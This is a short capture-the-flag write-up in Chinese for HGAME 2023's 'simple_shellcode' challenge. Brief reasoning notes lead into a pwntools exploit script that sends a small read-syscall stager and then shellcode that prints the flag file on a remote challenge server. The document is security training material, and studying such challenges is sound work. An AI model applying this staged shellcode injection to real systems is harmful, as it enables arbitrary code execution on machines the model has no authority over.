Problem: [HGAME 2023 week1]simple_shellcode
思路
题目提示重读 gdb动调 发现rdi有值
清空 rdx是0xcafe0000 直接转移
rdx也是读取字节 这里设置这么大无伤大雅 懒得改 直接syscall
然后根据之前的payload大小生成垃圾字符 后面跟shellcode 这样执行完刚好到我们shellcode
直接输出flag
EXP
from pwn import *
from LibcSearcher import *
#from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
io = remote("node5.anna.nssctf.cn",24834)
#io = process("./vuln")
e = ELF('./vuln')
libc = ELF('./libc-2.31.so')
def get_addr():
return u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def bug():
attach(io)
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
r = lambda num :io.recv(num)
ru = lambda delims, drop=True :io.recvuntil(delims, drop)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
ls = lambda data :log.success(data)
code = """
xor rdi,rdi
mov rsi,rdx
syscall
"""
payload = asm(code)
ls("shellcode byte=>"+str(len(payload)))
#bug()
sa(b"shellcode",payload)
payload1 = b'a'*len(payload) + asm(shellcraft.cat('/flag'))
s(payload1)
io.interactive()总结
- 对该题的考点总结